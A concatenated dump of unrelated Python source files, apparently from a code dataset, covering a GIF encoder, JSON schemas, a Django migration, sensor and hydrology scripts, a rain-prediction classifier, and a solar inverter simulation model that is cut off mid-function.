import FunctionBinaryString.GetByte
import FunctionBinaryString.Length
import FunctionBinaryString.Md5
import FunctionBinaryString.SetByte
import FunctionBinaryString.Sha256
import FunctionBinaryString.Substr
import FunctionBinaryString.Substring
import FunctionBinaryString.Trim
#-------------------------------
print("FUNCTION MATHEMATIC")
import FunctionMathematical.Abs
#import FunctionMathematical.Cbrt
import FunctionMathematical.Ceil
import FunctionMathematical.Ceiling
import FunctionMathematical.Degrees
import FunctionMathematical.Factorial
import FunctionMathematical.Floor
import FunctionMathematical.Gcd
#import FunctionMathematical.Lcm
#import FunctionMathematical.Ln
import FunctionMathematical.Log
import FunctionMathematical.Log10
#import FunctionMathematical.MinScale
import FunctionMathematical.Mod
import FunctionMathematical.PI
import FunctionMathematical.Power
import FunctionMathematical.Radians
import FunctionMathematical.Random
import FunctionMathematical.Round
import FunctionMathematical.Scale
#import FunctionMathematical.SetSeed
#import FunctionMathematical.Sign
import FunctionMathematical.Sqrt
#import FunctionMathematical.TrimScale
import FunctionMathematical.Trunc
#import FunctionMathematical.WidthBucket
#-------------------------------
print("FUNCTION TRIGONOMETRIC")
import FunctionTrigonometric.Acos
import FunctionTrigonometric.Acosh
import FunctionTrigonometric.Asin
import FunctionTrigonometric.Asinh
import FunctionTrigonometric.Atan
import FunctionTrigonometric.Atan2
import FunctionTrigonometric.Atanh
import FunctionTrigonometric.Cos
import FunctionTrigonometric.Cosh
import FunctionTrigonometric.Cot
import FunctionTrigonometric.Sin
import FunctionTrigonometric.Sinh
import FunctionTrigonometric.Tan
import FunctionTrigonometric.Tanh
print("hola") | StarcoderdataPython |
6622886 | #!/usr/bin/env python
import unittest
from journals.databases.icat.sns.interface import SnsICatInterface
if __name__=="__main__":
conn = SnsICatInterface()
#print(conn.get_instruments())
print(conn.get_experiments('NOM'))
#print(conn.get_experiments_meta('NOM'))
#print(conn.get_experiments_id_and_title('NOM'))
#print(conn.get_experiments_id_and_date('NOM'))
#print(conn.get_runs_all('NOM','IPTS-17210'))
#print(conn.get_runs('NOM','IPTS-17210'))
#print(conn.get_runs_meta('NOM','IPTS-17210'))
#print(conn.get_run_number_and_title('NOM','IPTS-17210'))
#print(conn.get_user_experiments('ntm'))
#print(conn.get_runs_meta('NOM', 'IPTS-8814'))
| StarcoderdataPython |
8186460 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
USER = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"username": {
"type": "string",
"minLength": 2,
"maxLength": 32
},
"password": {
"type": "string",
"minLength": 8,
"maxLength": 32
},
"is_admin": {
"type": "boolean"
},
"is_superadmin": {
"type": "boolean"
},
"is_active": {
"type": "boolean"
}
}
}
ICON = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"url": {
"type": "string",
"minLength": 9,
"maxLength": 512
},
"approved": {
"type": "boolean"
}
}
}
SECTION = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": {
"type": "string",
"minLength": 1,
"maxLength": 128
},
"icon": {
"type": "integer"
},
"description": {
"type": "string",
"minLength": 0,
"maxLength": 16000
}
}
}
SUBSECTION = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": {
"type": "string",
"minLength": 1,
"maxLength": 128
},
"icon": {
"type": "integer"
},
"section": {
"type": "integer"
},
"description": {
"type": "string",
"minLength": 0,
"maxLength": 16000
}
}
}
CATEGORY = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": {
"type": "string",
"minLength": 1,
"maxLength": 128
},
"icon": {
"type": "integer"
},
"subsection": {
"type": "integer"
},
"description": {
"type": "string",
"minLength": 0,
"maxLength": 16000
}
}
}
SMILE = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"url": {
"type": "string",
"minLength": 9,
"maxLength": 512
},
"w": {
"type": "integer",
"minimum": 1
},
"h": {
"type": "integer",
"minimum": 1
},
"category": {
"type": ["integer", "null"]
},
"description": {
"type": "string",
"minLength": 0,
"maxLength": 16000
},
"tags": {
"type": "array",
"items": {
"type": "string",
"minLength": 1,
"maxLength": 48
}
},
"add_tags": {
"type": "array",
"items": {
"type": "string",
"minLength": 1,
"maxLength": 48
}
},
"remove_tags": {
"type": "array",
"items": {
"type": "string",
"minLength": 1,
"maxLength": 48
}
},
"approved": {
"type": "boolean"
},
"hidden": {
"type": "boolean"
}
}
}
SMILEPACK = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": {
"type": "string",
"minLength": 0,
"maxLength": 64
},
"fork": {
"type": ["string", "null"]
},
"edit": {
"type": ["string", "null"]
},
"categories": {
"type": "array",
"items": {
"type": "object",
"properties": {
"name": {
"type": "string",
"minLength": 0,
"maxLength": 128
},
"description": {
"type": "string",
"minLength": 0,
"maxLength": 16000
},
"icon": {
"type": "integer"
}
},
"required": ["icon"]
}
},
"smiles": {
"type": "array",
"items": {
"type": "object",
"properties": {
"id": {
"type": "integer"
},
"category": {
"type": "integer",
"mininum": 0
},
"w": {
"type": "integer",
"minimum": 1
},
"h": {
"type": "integer",
"minimum": 1
}
},
"required": ["category", "id"],
}
},
"lifetime": {
"type": "integer"
},
"icon": {
"type": "integer"
},
},
"required": ["categories", "smiles"]
}
USERSCRIPT_COMPAT = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "array",
"items": {
"type": "object",
"properties": {
"categories": {
"type": "array",
"items": {
"properties": {
"iconId": {
"type": "integer"
},
"smiles": {
"type": "array",
"items": {
"type": "object",
"properties": {
"id": {
"type": ["string", "integer"]
},
"w": {
"type": "integer"
},
"h": {
"type": "integer"
},
"url": {
"type": "string"
}
},
"oneOf": [
{"required": ["w", "h"]}
]
}
}
},
"required": ["smiles"]
},
}
},
"required": ["categories"]
}
}
| StarcoderdataPython |
3524184 | <gh_stars>1-10
from machine import Pin
import machine
import time
#utime is an library used for getting the current time and date
#measuring time intervals, and for delays
import utime
#set the input to trigger module to send ultrasonic waves
#the trigger pin (transmitter) must be set as OUTPUT
trig_pin = Pin(0, Pin.OUT)#D3
#set he output received representing the reflection of waves
#the echo pin (receiver) must be set as INPUT
echo_pin = Pin(14, Pin.IN)#D5
while True:
#set the trigPin to LOW(0) in order to prepare for the next reading
trig_pin.value(0)
#delay for 2 microseconds
utime.sleep_us(2)
#generate an ultrasound for 10 microseconds then turn off the transmitter
trig_pin.value(1)
utime.sleep_us(10)
trigg_pin.value(0)
#find the time using machine.time_pulse_us(pin, pulse_level, timeout_us=1000000)
#Time a pulse on the given pin, and return the duration of the pulse in microsecond
# 29000 timeout optional => nr milisecunds witch the pulse have to wait for begin
time = machine.time_pulse_us(echo_pin, 1)
#the formula for distance d = t*v/2
#v represents the speed of sound in air (about 0.034 cm/μs)
#t is the time, the duration of the pulse
distance=(time*0.034)/2
print("The distance is {} cm".format(distance)) | StarcoderdataPython |
4991478 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-21 07:19
from __future__ import unicode_literals
import PeopleApp.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('PeopleApp', '0007_batch_undergraduatestudents'),
]
operations = [
migrations.CreateModel(
name='MscStudents',
fields=[
('rollno', models.CharField(max_length=12, primary_key=True, serialize=False)),
('name', models.CharField(max_length=100)),
('email', models.CharField(max_length=50, unique=True)),
('profile_picture', models.ImageField(blank=True, null=True, upload_to=PeopleApp.models.get_image_path)),
('batch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='PeopleApp.Batch')),
],
),
migrations.AlterField(
model_name='undergraduatestudents',
name='name',
field=models.CharField(max_length=100),
),
]
| StarcoderdataPython |
11240574 | # -*- coding: utf-8 -*-
"""
~~~~~~~~~~~~~~~~~~~~
A simple GIF encoder
~~~~~~~~~~~~~~~~~~~~
Structure of a GIF file: (in the order they appear)
1. always begins with the logical screen descriptor.
2. then follows the global color table.
3. then follows the loop control block (specify the number of loops).
4. then follows the image data of the frames,
each frame is further divided into:
(i) a graphics control block that specify the delay and
transparent color of this frame.
(ii) the image descriptor.
(iii) the LZW encoded data.
5. finally the trailor '0x3B'.
Reference for the GIF89a specification:
http://giflib.sourceforge.net/whatsinagif/index.html
"""
from struct import pack
class DataBlock(object):
"""
Write bits into a bytearray and then pack this bytearray into data blocks.
This class is used in the Lempel-Ziv-Welch compression algorithm when
encoding maze into frames.
"""
def __init__(self):
self._bitstream = bytearray() # write bits into this array
self._nbits = 0 # a counter holds how many bits have been written
def encode_bits(self, num, size):
"""
Given a number `num`, encode it as a binary string of length `size`,
and pack it at the end of bitstream.
Example: num = 3, size = 5. The binary string for 3 is '00011' (it's
'0b00011' in python), here we padded extra zeros at the left to make
its length to be 5. The tricky part is that in a gif file, the encoded
binary data stream increases from lower (least significant) bits to higher
(most significant) bits, so we have to reverse it as '11000' and pack
this string at the end of bitstream!
"""
string = bin(num)[2:].zfill(size)
for digit in reversed(string):
if len(self._bitstream) * 8 == self._nbits:
self._bitstream.append(0)
if digit == '1':
self._bitstream[-1] |= 1 << self._nbits % 8
self._nbits += 1
def dump_bytes(self):
"""
Pack the LZW encoded image data into blocks.
Each block is of length <= 255 and is preceded by a byte
in 0-255 that indicates the length of this block.
Each time after this function is called `_nbits` and
`_bitstream` are reset to 0 and empty.
"""
bytestream = bytearray()
while len(self._bitstream) > 255:
bytestream.append(255)
bytestream.extend(self._bitstream[:255])
self._bitstream = self._bitstream[255:]
if len(self._bitstream) > 0:
bytestream.append(len(self._bitstream))
bytestream.extend(self._bitstream)
self._nbits = 0
self._bitstream = bytearray()
return bytestream
class Compression(object):
"""
The Lempel-Ziv-Welch compression algorithm used by the GIF89a specification.
"""
def __init__(self, min_code_length):
"""
min_code_length: an integer between 2 and 12.
GIF allows the minimum code length as small as 2 and as large as 12.
Even there are only two colors, the minimum code length must be at least 2.
Note this is not actually the smallest code length that is used
in the encoding process since the minimum code length tells us
how many bits are needed just for the different colors of the image,
we still have to account for the two special codes `end` and `clear`.
Therefore the actual smallest code length that will be used is one more
than `min_code_length`.
"""
if not isinstance(min_code_length, int) \
and not 2 <= min_code_length <= 12:
raise ValueError('Invalid minimum code length.')
self._stream = DataBlock()
self._min_code_length = min_code_length
self._clear_code = 1 << min_code_length
self._end_code = self._clear_code + 1
self._max_codes = 4096
def __call__(self, input_data):
"""
input_data: a 1-d list consists of integers in range [0, 255],
these integers are the indices of the colors of the pixels
in the global color table.
We do not check the validity of the input data here for efficiency.
"""
# this is actually the minimum code length used
code_length = self._min_code_length + 1
next_code = self._end_code + 1
# the default initial dict
code_table = {(i,): i for i in range(1 << self._min_code_length)}
# output the clear code
self._stream.encode_bits(self._clear_code, code_length)
pattern = tuple()
for c in input_data:
pattern += (c,)
if pattern not in code_table:
# add new code to the table
code_table[pattern] = next_code
# output the prefix
self._stream.encode_bits(code_table[pattern[:-1]], code_length)
pattern = (c,) # suffix becomes the current pattern
next_code += 1
if next_code == 2**code_length + 1:
code_length += 1
if next_code == self._max_codes:
next_code = self._end_code + 1
self._stream.encode_bits(self._clear_code, code_length)
code_length = self._min_code_length + 1
code_table = {(i,): i for i in range(1 << self._min_code_length)}
self._stream.encode_bits(code_table[pattern], code_length)
self._stream.encode_bits(self._end_code, code_length)
return bytearray([self._min_code_length]) + self._stream.dump_bytes() + bytearray([0])
def screen_descriptor(width, height, color_depth):
"""
This block specifies both the size of the image and its global color table.
"""
byte = 0b10000000 | (color_depth - 1) | (color_depth - 1) << 4
return pack('<6s2H3B', b'GIF89a', width, height, byte, 0, 0)
def loop_control_block(loop):
"""
This block specifies the number of loops (0 means loop infinitely).
"""
return pack('<3B8s3s2BHB', 0x21, 0xFF, 11, b'NETSCAPE', b'2.0', 3, 1, loop, 0)
def graphics_control_block(delay, trans_index=None):
"""
This block specifies the delay and transparent color of the coming frame.
`trans_index=None` means no transparent color.
For static frames this block is not added.
"""
if trans_index is None:
return pack("<4BH2B", 0x21, 0xF9, 4, 0b00000100, delay, 0, 0)
else:
return pack("<4BH2B", 0x21, 0xF9, 4, 0b00000101, delay, trans_index, 0)
def image_descriptor(left, top, width, height, byte=0):
"""
This block specifies the position of the coming frame (relative to the window)
and whether it has a local color table or not.
"""
return pack('<B4HB', 0x2C, left, top, width, height, byte)
def global_color_table(color_depth, palette):
"""
Return a valid global color table.
The global color table of a GIF image is a 1-d bytearray of the form
[r1, g1, b1, r2, g2, b2, ...] with length equals to 2**n where n is
the color depth of the image.
----------
Parameters
color_depth: color depth of the GIF.
palette: a list of rgb colors of the format [r1, g1, b1, r2, g2, b2, ...].
The number of colors must be greater than or equal to 2**n where n is
the color depth. Redundant colors will be discarded.
"""
try:
palette = bytearray(palette)
except:
raise ValueError('Cannot convert palette to bytearray.')
valid_length = 3 * (1 << color_depth)
if len(palette) < valid_length:
raise ValueError('Invalid palette length.')
if len(palette) > valid_length:
palette = palette[:valid_length]
return palette
| StarcoderdataPython |
6477731 | <reponame>scottza/PyTOPKAPI
import datetime as dt
from configparser import SafeConfigParser
import h5py
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.dates import date2num
import pytopkapi.utils as ut
def run(ini_file='plot_Qsim_Qobs_Rain.ini'):
config = SafeConfigParser()
config.read(ini_file)
print('Read the file ',ini_file)
file_Qsim=config.get('files','file_Qsim')
file_Qobs=config.get('files','file_Qobs')
file_rain=config.get('files','file_rain')
image_out=config.get('files','image_out')
group_name=config.get('groups','group_name')
Qobs=config.getboolean('flags','Qobs')
Pobs=config.getboolean('flags','Pobs')
nash=config.getboolean('flags','nash')
tab_col=['k','r']
tab_style=['-','-']
tab_width=['1','1']
color_P='b'
transparency_P=0.5#(0 for invisible)
#create path_out if it does'nt exist
ut.check_file_exist(image_out)
#Read the obs
#Qobs
ar_date, ar_Qobs = read_observed_flow(file_Qobs)
delta = date2num(ar_date[1]) - date2num(ar_date[0])
#Rain
if Pobs:
h5file = h5py.File(file_rain)
dset_string = '/%s/rainfall' % group_name
ndar_rain = h5file[dset_string][...]
h5file.close()
#Compute the mean catchment rainfall
ar_rain=np.average(ndar_rain,axis=1)
#Read the simulated data Q
file_h5=file_Qsim
ndar_Qc_out=ut.read_one_array_hdf(file_h5,'Channel','Qc_out')
ar_Qsim=ndar_Qc_out[1:,0]
##Graph
fig, ax = plt.subplots()
lines = []
tab_leg = []
if Qobs:
lines += ax.plot(ar_date, ar_Qobs,
color=tab_col[-1],
linestyle=tab_style[-1], linewidth=tab_width[-1])
tab_leg.append(('Observation'))
tab_leg = tab_leg[::-1]
lines += ax.plot(ar_date, ar_Qsim,
color=tab_col[0],
linestyle=tab_style[0], linewidth=tab_width[0])
tab_leg.append('Model')
if nash:
nash_value = ut.Nash(ar_Qsim,ar_Qobs)
lines += ax.plot(ar_date[0:1], ar_Qsim[0:1], 'w:')
tab_leg.append(('Eff = '+str(nash_value)[0:5]))
ax.set_xlim(ar_date[0], ar_date[-1])
ytitle=r'$Q \ (m^3/s)$'
ax.set_ylabel(ytitle, fontsize=18)
ax.set_title(group_name)
ax2 = ax.twinx()
ax2.set_ylabel(r'$Rainfall \ (mm)$', fontsize=18, color=color_P)
ax2.bar(ar_date, ar_rain, width=delta,
facecolor='blue', edgecolor='blue', alpha=transparency_P)
ax2.set_ylim(max(ar_rain)*2, min(ar_rain))
ax2.legend(lines, tab_leg, loc='upper right', fancybox=True)
leg = ax2.get_legend()
leg.get_frame().set_alpha(0.75)
# rotate and align the tick labels so they look better,
# unfortunately autofmt_xdate doesn't work with twinx due to a bug
# in matplotlib <= 1.0.0 so we do it manually
## fig.autofmt_xdate()
bottom=0.2
rotation=30
ha='right'
for ax in fig.get_axes():
if hasattr(ax, 'is_last_row') and ax.is_last_row():
for label in ax.get_xticklabels():
label.set_ha(ha)
label.set_rotation(rotation)
else:
for label in ax.get_xticklabels():
label.set_visible(False)
ax.set_xlabel('')
fig.subplots_adjust(bottom=bottom)
fig.savefig(image_out)
plt.show()
def read_observed_flow(file_name):
"""Read the observed flow from a data file.
"""
date = np.loadtxt(file_name, dtype=np.int, usecols=(0, 1, 2, 3, 4))
dates = [dt.datetime(yr, mon, dy, hr, mn) for yr, mon, dy, hr, mn in date]
Q = np.loadtxt(file_name, usecols=(5,))
return dates, Q
| StarcoderdataPython |
8035170 | <gh_stars>0
class Solution:
def missingNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
return sum(range(len(nums)+1)) - sum(nums) | StarcoderdataPython |
6619993 | import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.impute import SimpleImputer
from sklearn.preprocessing import OrdinalEncoder
from sklearn.metrics import roc_curve as ROC
import matplotlib.pyplot as plt
from sklearn.metrics import classification_report
from sklearn import svm
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import recall_score
from sklearn.metrics import roc_auc_score
import warnings
warnings.filterwarnings("ignore")
def dataWash(city, path: str):
weather = pd.read_csv(path)
X = weather.iloc[:,:-1]
Y = weather.loc[:,("Location","RainTomorrow")]
X = X.loc[X.loc[:,"Location"] == city]
Y = Y.loc[Y.loc[:,"Location"] == city]
Y =Y.drop(['Location'], axis=1)
X =X.drop(['Location'], axis=1)
#get month
X["Date"] = X["Date"].apply(lambda x:int(x.split("/")[1]))
X = X.rename(columns={"Date":"Month"})
#fill Null object-data up with most frequent value
cate = X.columns[X.dtypes == "object"].tolist()
si = SimpleImputer(missing_values=np.nan,strategy="most_frequent")
si.fit(X.loc[:,cate])
X.loc[:,cate] = si.transform(X.loc[:,cate])
#encode object data
oe = OrdinalEncoder()
oe = oe.fit(X.loc[:,cate])
X.loc[:,cate] = oe.transform(X.loc[:,cate])
oe = oe.fit(Y.loc[:,:])
Y.loc[:,:] = oe.transform(Y.loc[:,:])
#fill float data up with mean value.
col = X.columns[X.dtypes == "float64"].tolist()
impmean = SimpleImputer(missing_values=np.nan,strategy = "mean")
impmean = impmean.fit(X.loc[:,col])
X.loc[:,col] = impmean.transform(X.loc[:,col])
return X, Y
def Solution(city, Xt, Yt):
Xtrain, Xtest, Ytrain, Ytest = train_test_split(Xt,Yt,test_size=0.3)
Xreal, Yreal = dataWash(city, '%s.csv' % (city))
print(Xreal)
print(Yreal)
for i in [Xtrain,Xtest,Ytrain,Ytest]:
i.index = range(i.shape[0])
clf = LogisticRegression()
clf.fit(Xtrain, Ytrain.values.ravel())
result = clf.predict(Xtest)
score = clf.score(Xtest,Ytest.values.ravel())
recall = recall_score(Ytest.values.ravel(), result)
auc = roc_auc_score(Ytest.values.ravel(),clf.decision_function(Xtest))
#print("LR's testing accuracy %f, recall is %f, auc is %f" % (score,recall,auc))
#print(clf.predict(Xreal))
#print(clf.score(Xtrain, Ytrain.values.ravel()))
'''
#draw ROC curve
FPR, Recall, thresholds = ROC(Ytest,clf.decision_function(Xtest),pos_label=1)
area = roc_auc_score(Ytest,clf.decision_function(Xtest))
plt.figure()
plt.plot(FPR, Recall, color='red',
label='ROC curve (area = %0.2f)' % area)
plt.plot([0, 1], [0, 1], color='black', linestyle='--')
plt.xlim([-0.05, 1.05])
plt.ylim([-0.05, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('Recall')
plt.title('Receiver operating characteristic example')
plt.legend(loc="lower right")
plt.show()
'''
#report
#print(classification_report(Ytest.values.ravel(), result))
| StarcoderdataPython |
8112927 | <gh_stars>10-100
"""Single phase constant Vdc PV-DER code."""
from __future__ import division
import numpy as np
import math
import cmath
import scipy
import six
import pdb
import warnings
from pvder.DER_components import SolarPVDER,PVModule
from pvder.grid_components import BaseValues
from pvder import utility_functions
from pvder import defaults,templates
from pvder.logutil import LogUtil
class SolarPVDERSinglePhaseConstantVdc(PVModule,SolarPVDER):
"""
Class for describing a Solar Photo-voltaic Distributed Energy Resource consisting of panel, converters, and
control systems.
Attributes:
count (int): Number of instances of `SolarPVDERSinglePhaseConstantVdc`.
n_ODE (int): Number of ODE's.
"""
count = 0
def __init__(self,events,configFile=None,**kwargs):
"""Creates an instance of `SolarPV_DER_SinglePhase`.
Args:
events (SimulationEvents): An instance of `SimulationEvents`.
gridModel (Grid): An instance of `Grid`(only need to be suppled for stand alone simulation).
powerRating (float): A scalar specifying the rated power (VA) of the DER.
VrmsRating (float): A scalar specifying the rated RMS L-G voltage (V) of the DER.
ia0,xa0,ua0 (complex): Initial value of inverter states in p.u. of the DER instance.
xP0,xQ0,xPLL0,wte0 (float): Initial value of inverter states in the DER instance.
gridVoltatePhaseA: Initial voltage phasor (V) at PCC - LV side from external program (only need to be suppled if model is not stand alone).
standAlone (bool): Specify if the DER instance is a stand alone simulation or part of a larger simulation.
steadyStateInitialization (bool): Specify whether states in the DER instance will be initialized to steady state values.
allowUnbalancedM (bool): Allow duty cycles to take on unbalanced values during initialization (default: False).
derConfig (dict): Configuration parameters that may be supplied from an external program.
identifier (str): An identifier that can be used to name the instance (default: None).
Raises:
ValueError: If parameters corresponding to `Sinverter_rated` are not available.
ValueError: If rated DC link voltage is not sufficient.
"""
try:
SolarPVDERSinglePhaseConstantVdc.count = SolarPVDERSinglePhaseConstantVdc.count+1 #Increment count to keep track of number of PV-DER model instances
DER_arguments = self.setup_DER(events,configFile,**kwargs)
if six.PY3:
super().__init__(self.DER_config['basic_options']['Sinsol'])#Initialize PV module class (base class)
elif six.PY2:
super(SolarPVDERSinglePhaseConstantVdc,self).__init__(self.DER_config['basic_options']['Sinsol'])
self.initialize_DER(DER_arguments)
self.creation_message()
except:
LogUtil.exception_handler()
@property#Decorator used for auto updating
def y0(self):
"""List of initial states"""
try:
return[self.ia.real, self.ia.imag, self.xa.real, self.xa.imag, self.ua.real,self.ua.imag,
self.xP,self.xQ,self.xPLL,self.wte]
except:
LogUtil.exception_handler()
#Apparent power output at inverter terminal
def S_calc(self):
"""Inverter apparent power output"""
try:
return (1/2)*(self.vta*self.ia.conjugate())*1.0
except:
LogUtil.exception_handler()
#Apparent power output at PCC - LV side
def S_PCC_calc(self):
"""Power output at PCC LV side"""
try:
return (1/2)*(self.va*self.ia.conjugate())
#return utility_functions.S_calc(self.va,self.vb,self.vc,self.ia,self.ib,self.ic)
except:
LogUtil.exception_handler()
def S_load1_calc(self):
"""Power absorbed by load at PCC LV side."""
return (1/2)*(self.va*(-(self.va/self.Zload1)).conjugate())
def S_G_calc(self):
"""Power absorbed/produced by grid voltage source."""
try:
return (1/2)*(-(self.ia-(self.va/self.Zload1))/self.a).conjugate()*self.grid_model.vag
except:
LogUtil.exception_handler()
#@property
def Vtrms_calc(self):
"""Inverter terminal voltage -RMS"""
try:
return utility_functions.Urms_calc(self.vta,self.vta,self.vta)
except:
LogUtil.exception_handler()
def Vrms_calc(self):
"""PCC LV side voltage - RMS"""
try:
return utility_functions.Urms_calc(self.va,self.va,self.va)
except:
LogUtil.exception_handler()
def Irms_calc(self):
"""Inverter current - RMS"""
return utility_functions.Urms_calc(self.ia,self.ia,self.ia)
def Vabrms_calc(self):
"""PCC LV side voltage - line to lineRMS"""
try:
return abs(self.va-self.vb)/math.sqrt(2)
except:
LogUtil.exception_handler()
def update_inverter_states(self,ia,xa,ua,xP,xQ,xPLL,wte):
"""Update inverter states
Args:
ia (complex): Inverter phase a current.
xa (complex): Inverter controller state.
ua (complex): Inverter controller state.
Vdc (float): DC link voltage.
"""
try:
self.ia = ia
self.xa = xa
self.ua = ua
self.xP = xP
self.xQ = xQ
self.xPLL = xPLL
self.wte = wte
except:
LogUtil.exception_handler()
def update_voltages(self):
"""Update voltages."""
try:
self.vta = self.vta_calc() #Update inverter terminal voltage
self.va = self.va_calc() #Update PCC LV side voltage
except:
LogUtil.exception_handler()
def update_RMS(self):
"""Update RMS voltages."""
try:
self.Vtrms = self.Vtrms_calc()
self.Vrms_min = self.Vrms = self.Vrms_calc()
self.Irms = self.Irms_calc()
#Update RMS values
if self.DO_EXTRA_CALCULATIONS:
pass
except:
LogUtil.exception_handler()
def update_power(self):
"""Update RMS voltages."""
try:
#Update power output
self.S = self.S_calc()
self.S_PCC = self.S_PCC_calc()
if self.standAlone:#Update load current and grid voltage source power only in stand alone mode
self.iaload1 = self.iphload1_calc(self.va)
self.S_G = self.S_G_calc()
self.S_load1 = self.S_load1_calc()
except:
LogUtil.exception_handler()
def update_Pref(self):
"""Update active power reference"""
try:
if not self.use_Pref:
self.Pref = self.Ppv
else:
raise ValueError('{}:User active power reference not implemented!')
except:
LogUtil.exception_handler()
def update_iref(self,t):
"""Update current reference"""
try:
if self.current_gradient_limiter:
self.ia_ref = self.get_ramp_limited_iref(t,self.ia_ref_activepower_control())
else:
self.ia_ref = self.ia_ref_activepower_control() #Get current controller setpoint
except:
LogUtil.exception_handler()
def update_inverter_frequency(self,t):
"""Update inverter PLL frequency.
Args:
t (float): Simulation time in seconds.
"""
try:
self.wgrid_measured = self.wgrid_calc(t) #Update grid frequency
#Convert PCC LV side voltage from phasor to alpha-beta domain
self.valpha = utility_functions.phasor_to_time_1phase(self.va,w=self.wgrid_measured,t=t)
self.vbeta =utility_functions.phasor_to_time_1phase(self.va*pow(math.e,-1j*(math.pi/2)),w=self.wgrid_measured,t=t)
#Convert from alpha-beta domain to d-q domain using Parks transformation
self.vd,self.vq = utility_functions.alpha_beta_to_d_q(self.valpha,self.vbeta,self.wte)
#Calculate inverter frequency from PLL equation
self.we = self.we_calc()
self.winv = self.we
except:
LogUtil.exception_handler()
def ODE_model(self,y,t):
"""System of ODE's defining the dynamic DER model.
Args:
y (list of float): Initial conditions for the states..
t (float): Simulation time in seconds.
Returns:
result (list of float): Derivates for the system of ODE's.
"""
try:
iaR, iaI, xaR, xaI, uaR, uaI, xP, xQ, xPLL, wte = y # unpack current values of y
self.update_inverter_states(iaR + 1j*iaI, xaR + 1j*xaI,uaR + 1j*uaI,
xP,xQ,
xPLL,wte)
self.update_Ppv(t)
self.update_Zload1(t)
self.update_voltages()
self.update_power()
self.update_RMS()
self.update_Qref(t)
self.update_iref(t)
self.update_inverter_frequency(t)
self.update_ridethrough_flags(t)
self.disconnect_or_reconnect(t)
#Phase a inverter output current
diaR = (1/self.Lf)*(-self.Rf*self.ia.real - self.va.real + self.vta.real) + (self.winv/self.wbase)*self.ia.imag
diaI = (1/self.Lf)*(-self.Rf*self.ia.imag - self.va.imag + self.vta.imag) - (self.winv/self.wbase)*self.ia.real
#Current controller dynamics
if abs(self.Kp_GCC*self.ua + self.xa)>self.m_limit:
if np.sign(self.Ki_GCC*self.ua.real) == np.sign(self.xa.real):
dxaR = 0.0
else:
dxaR = self.Ki_GCC*self.ua.real
if np.sign(self.Ki_GCC*self.ua.imag) == np.sign(self.xa.imag):
dxaI = 0.0
else:
dxaI = self.Ki_GCC*self.ua.imag
#six.print_(dxaR+1j*dxaI,np.sign(self.Ki_GCC*self.ua))
else:
dxaR = self.Ki_GCC*self.ua.real
dxaI = self.Ki_GCC*self.ua.imag
if abs(self.Kp_GCC*self.ua + self.xa)>self.m_limit:
if np.sign( (self.wp)*(-self.ua.real +self.ia_ref.real - self.ia.real)) == np.sign(self.ua.real):
duaR = 0.0
else:
duaR = (self.wp)*(-self.ua.real +self.ia_ref.real - self.ia.real)
if np.sign((self.wp)*(-self.ua.imag +self.ia_ref.imag - self.ia.imag)) == np.sign(self.ua.imag):
duaI = 0.0
else:
duaI = (self.wp)*(-self.ua.imag +self.ia_ref.imag - self.ia.imag)
else:
duaR = (self.wp)*(-self.ua.real +self.ia_ref.real - self.ia.real)
duaI = (self.wp)*(-self.ua.imag +self.ia_ref.imag - self.ia.imag)
#DC link voltage dynamics
dVdc = 0.0
if abs(self.xP + self.Kp_P*(self.Ppv -self.S.real) + 1j*(self.xQ- self.Kp_Q*(self.Q_ref - self.S_PCC.imag)))>self.iref_limit:
if np.sign(self.Ki_P*(self.Ppv -self.S.real)) == np.sign(self.xP):
dxP = 0.0
else:
dxP = self.Ki_P*(self.Ppv -self.S.real)
else:
dxP = self.Ki_P*(self.Ppv -self.S.real)
# Reactive power controller dynamics
if abs(self.xP + self.Kp_P*(self.Ppv -self.S.real) + 1j*(self.xQ- self.Kp_Q*(self.Q_ref - self.S_PCC.imag)))>self.iref_limit:
if np.sign(-self.Ki_Q*(self.Q_ref - self.S_PCC.imag)) == np.sign(self.xQ):
dxQ = 0.0
else:
dxQ = -self.Ki_Q*(self.Q_ref - self.S_PCC.imag)
else:
dxQ = -self.Ki_Q*(self.Q_ref - self.S_PCC.imag)
#SRF-PLL dynamics
dxPLL = self.Ki_PLL*(self.vd)
#Frequency integration to get angle
dwte = self.we
result = [ diaR,# list of dy/dt=f functions
diaI,
dxaR,
dxaI,
duaR,
duaI,
dxP,
dxQ,
dxPLL,
dwte]
return np.array(result)
except:
LogUtil.exception_handler()
def jac_ODE_model(self,y,t):
"""Jacobian for the system of ODE's.
Args:
y (list of float): Initial conditions for the states..
t (float): Simulation time in seconds.
Returns:
result (array of float): An array containing the elements of the Jacobian.
"""
try:
iaR, iaI, xaR, xaI, uaR, uaI,xP, xQ, xPLL, wte = y # unpack current values of y
#self.update_inverter_states(iaR,iaI,xaR,xaI,uaR,uaI,
# xP,xQ,
# xPLL,wte)
self.update_inverter_states(iaR + 1j*iaI, xaR + 1j*xaI,uaR + 1j*uaI,
xP,xQ,
xPLL,wte)
J = self.J
varInd = self.varInd
self.update_Ppv(t)
#self.update_Zload1(t)
self.update_voltages()
self.update_power()
self.update_RMS()
self.update_Qref(t)
#self.update_Vdc_ref(t)
self.update_iref(t)
#d-q transformation
self.update_inverter_frequency(t)
self.update_ridethrough_flags(t)
self.disconnect_or_reconnect(t)
#Phase a inverter output current
ra,theta_a = cmath.polar(self.va)
theta_a = self.wgrid_measured*t + theta_a - math.pi/2
